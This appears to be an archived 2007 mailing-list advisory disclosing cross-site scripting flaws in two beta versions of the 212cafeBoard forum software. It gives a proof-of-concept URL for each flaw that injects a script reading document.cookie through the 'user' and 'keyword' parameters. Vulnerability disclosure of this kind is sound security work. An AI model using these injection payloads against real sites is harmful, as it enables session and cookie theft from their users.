OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta )

xx_hack_xx_2004hotmail.com
Date: Sat Jan 20 2007 - 19:01:27 CST


Hello

Vulnerable : 212cafeBoard
Version: 0.08 Beta
         6.30 Beta
Web : http://www.212cafe.com

i found XSS 212cafeBoard v6.30 Beta :

http://www.example.com/Board/list3.php?user=[XSS]

For Example , you can put :
http://www.example.com/board/list3.php?user='><script>alert(document.cookie);</script>

-----------------
and i found XSS in 212cafeBoard v0.08 beta

http://www.example.com/board/search.php?keyword=[XSS]

For Example :
http://www.example.com/board/search.php?keyword='><script>alert(document.cookie);</script>

-------------------
Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,